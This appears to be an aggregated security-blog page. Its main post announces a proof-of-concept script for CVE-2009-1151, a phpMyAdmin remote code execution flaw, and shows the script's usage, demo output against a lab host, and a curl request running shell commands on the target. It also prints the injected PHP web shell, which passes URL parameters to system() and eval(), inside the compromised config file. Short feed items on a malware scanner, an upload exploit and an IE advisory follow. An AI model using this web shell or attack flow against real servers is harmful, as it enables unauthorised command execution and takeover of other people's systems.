06-09-2009 21:03 CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept  I couldn’t find any public PoC/exploit for this phpMyAdmin vulnerability, despite it being a serious bug affecting a popular open-source project. I think this vulnerability is a nice reminder that it’s still possible to perform remote command execution these days without relying on SQL injection (i.e.: xp_cmdshell) or a memory corruption bug (i.e.: heap overflow). All the documentation you need is in the script comments. I recommend you to go through it, before you actually run the script. After reading the public advisory and patched code, and playing around for a while, I managed to have a working PoC bash script. The script will allow you to remotely run shell commands and PHP code against vulnerable targets. Although in principle the vulnerability sounds quite simple, it actually took me a while to go from advisory to working attack code. I’m providing the script with the hope that it will help pentesters and security researchers. Please only test the script against your own systems, or systems you have been given permission to pentest! Don’t be evil, it’s not worth it. Demo $ ./phpMyAdminRCE.sh usage: ./phpMyAdminRCE.sh i.e.: ./phpMyAdminRCE.sh http://target.tld/phpMyAdmin/ $ ./phpMyAdminRCE.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/ [+] checking if phpMyAdmin exists on URL provided ... [+] phpMyAdmin cookie and form token received successfully. Good! [+] attempting to inject phpinfo() ... [+] success! phpinfo() injected successfully! output saved on /tmp/phpMyAdminRCE.sh.9217.phpinfo.flag.html [+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.: http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/ http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo(); please send any feedback/improvements for this script to unknown.pentestergmail.com $ curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/" total 96 drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin drwxr-xr-x 3 root root 4096 May 6 10:01 boot lrwxrwxrwx 1 root root 11 Oct 12 2008 cdrom -> media/cdrom drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc drwxr-xr-x 3 root root 4096 Oct 18 2008 home drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd [partial output removed for brevity reasons]Contents of /config/config.inc.php after our evil code has been successfully injected (injected code shown in bold): <?php /* * Generated configuration file * Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <michal@cihar.com> * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $ * Date: Tue, 09 Jun 2009 14:13:34 GMT */ /* Servers configuration */ $i = 0; /* Server (config:root) [1] */ $i++; $cfg['Servers'][$i]['host']=''; if($_GET['c']){echo '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo '<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root'; /* End of servers configuration */ ?> ThanksI’d like to thank Greg Ose for discovering such a cool vuln and doing a nice writeup about the technical details! Also big thanks to str0ke for testing this PoC script and providing such useful feedback! --- --- Next Stage Blogs :: Feedproxy Security Povezani zapisi: 03-12-2010 9:37 iScanner v0.4 released - Malicious codes scanner This tool is programmed by iSecur1ty using Ruby programming language and it's released under the terms of GNU Affero General Public License 3.0. Features Detect malicious codes in web pages, this include hidden iframe tags, javascript, vbscript and activex objects. Extensive log shows the infected files and the malicious code. (...) - Security Tools / Local auditing, Defense, Malware Scanner, iScanner security-database 03-10-2010 23:03 odlican.net cms v.1.5 remote file upload vulnerability /Teo  odlican.net cms v.1.5 remote file upload vulnerability
Author: Teo Manojlovic
http://packetstormsecurity.org/1002-exploits/odlican-upload.txt
http://secunia.com/advisories/38488/
http://www.exploit-db.com/exploits/11340
chaossecurity 03-10-2010 4:36 Microsoft Security Advisory 981374 - Remote Code Execution Vulnerability for IE6 and IE7, (Wed, Mar 10th) Several readers have pointed us towards this advisory. This Microsoft advisory outlines a vulnerability in Internet Explorer 6 and 7, which could allow remote code execution. While there are some mitigations available for IE7 (the Enhanced Security Mode) in Server 2003 and Server 2008, the best advice is to upgrade to Internet Explorer 8, which is not vulnerable. Find the advisory here == http://www.microsoft.com/technet/security/advisory/981374.mspx =============== Rob VandenBrink, Metafore ============== ISC 03-09-2010 5:11 Codevanced | ASP.NET MVC security checklist Shared by dre This is probably the coolest article I've seen in years |
